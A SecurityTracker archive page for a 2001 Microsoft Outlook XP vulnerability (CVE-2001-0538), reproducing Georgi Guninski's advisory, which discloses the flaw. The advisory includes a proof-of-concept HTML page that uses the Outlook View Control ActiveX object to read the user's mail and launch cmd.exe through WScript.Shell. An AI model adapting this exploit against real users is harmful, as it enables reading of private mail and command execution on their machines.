SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Microsoft Outlook Vendors:   Microsoft
Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
SecurityTracker Alert ID:  1001984
SecurityTracker URL:  http://securitytracker.com/id/1001984
CVE Reference:   CVE-2001-0538   (Links to External Site)
Updated:  Jul 15 2001
Original Entry Date:  Jul 12 2001
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): Outlook 98, 2000 or 2002
Description:   Georgi Guninski issued an advisory for Microsoft Outlook (part of Office XP), warning that it allows a web page or HTML-based e-mail message to cause arbitrary commands to be executed on the user's host.

The vulnerability is reportedly due to a vulnerable ActiveX control "Microsoft Outlook View Control" that is apparently installed by Outlook. This control reportedly exposes a property named "selection", which gives access to the user's mail messages, and the Outlook "Application" object, which allows commands to be executed on the user's host.

Impact:   A web page or HTML-based e-mail message could cause arbitrary commands to be executed on the user's host with the privileges of the user. This could also cause the user's e-mail to be viewed, modified, and/or deleted.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Microsoft Issues Fix) Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
The vendor has released a fix.
(Microsoft Issues Updated Fix) Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
The vendor has released an updated fix.



 Source Message Contents

Subject:  MS Office XP vulnerability


Georgi Guninski security advisory #49, 2001 

MS Office XP - the more money I give to Microsoft, the more vulnerable
my Windows computers are 

Systems affected: 
Win2K + IE 5.5 SP1 fully patched + Office XP. 
It was reported to work with IE6 beta also. 

Risk: High 
Date: 12 July 2001 

Legal Notice: 
This Advisory is Copyright (c) 2001 Georgi Guninski. 
You may distribute it unmodified. 
You may not modify it and distribute it or distribute parts 
of it without the author's written permission. 

Disclaimer: 
The information in this advisory is believed to be true based on 
experiments though it may be false. 
The opinions expressed in this advisory and program are my own and 
not of any company. The usual standard disclaimer applies, 
especially the fact that Georgi Guninski is not liable for any damages 
caused by direct or  indirect use of the information or functionality 
provided by this advisory or program. Georgi Guninski bears no 
responsibility for content or misuse of this advisory or program or 
any derivatives thereof. 

If you want to link to this advisory or reference it use the URL: 
http://www.guninski.com/vv2xp.html 
The above especially applies for companies like Mitre and BugNet 

Background: 

Recently I bought Office XP. 
It was quite unpleasant feeling giving so much money for so buggy 
product. 

Description: 

If a user visits a specially designed html page with IE or opens or 
previews a message with Outlook XP arbitrary commands may be 
executed on his computer. This may lead to taking full control over 
user's computer. 
Using another approach to this bug allows reading, modifying and
deleting 
messages in user's Outlook XP folders. 
                     

Details: 
The problem is again ActiveX. This time Office XP seems to install a 
malicous ActiveX control - "Microsoft Outlook View Control". 
This control exposes property named "selection" which gives access to
user's 
mail messages. It also exposes the Outlook "Application" object which
may lead  
to execution of arbitrary programs of the user's computer. 
Examine the script below for more information 

Demonstration: 
http://www.guninski.com/vv3-2demo.html 
----------------------------------------------------- 
This assumes you have at least one message in Outlook XP's Inbox 
<br> 
<object id="o1" 
classid="clsid:0006F063-0000-0000-C000-000000000046" 
> 
<param name="folder" value="Inbox"> 
</object> 

<script> 
function f() 
{ 
//alert(o2.object); 
sel=o1.object.selection; 
vv1=sel.Item(1); 
alert("Subject="+vv1.Subject); 
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]"); 
alert("May be deleted"); 
//vv1.Delete(); 

vv2=vv1.Session.Application.CreateObject("WScript.Shell"); 

alert("Much more fun is possible"); 
                     

vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ "); 

} 
setTimeout("f()",2000); 
</script> 
----------------------------------------------------- 
                     

Solution: 
Uninstall Office XP and Windows. 

Vendor status: 
Microsoft was informed on 9 July 2001. 
As far I could understand they are still investigating my report. 
                     

Regards, 
Georgi Guninski 
http://www.guninski.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC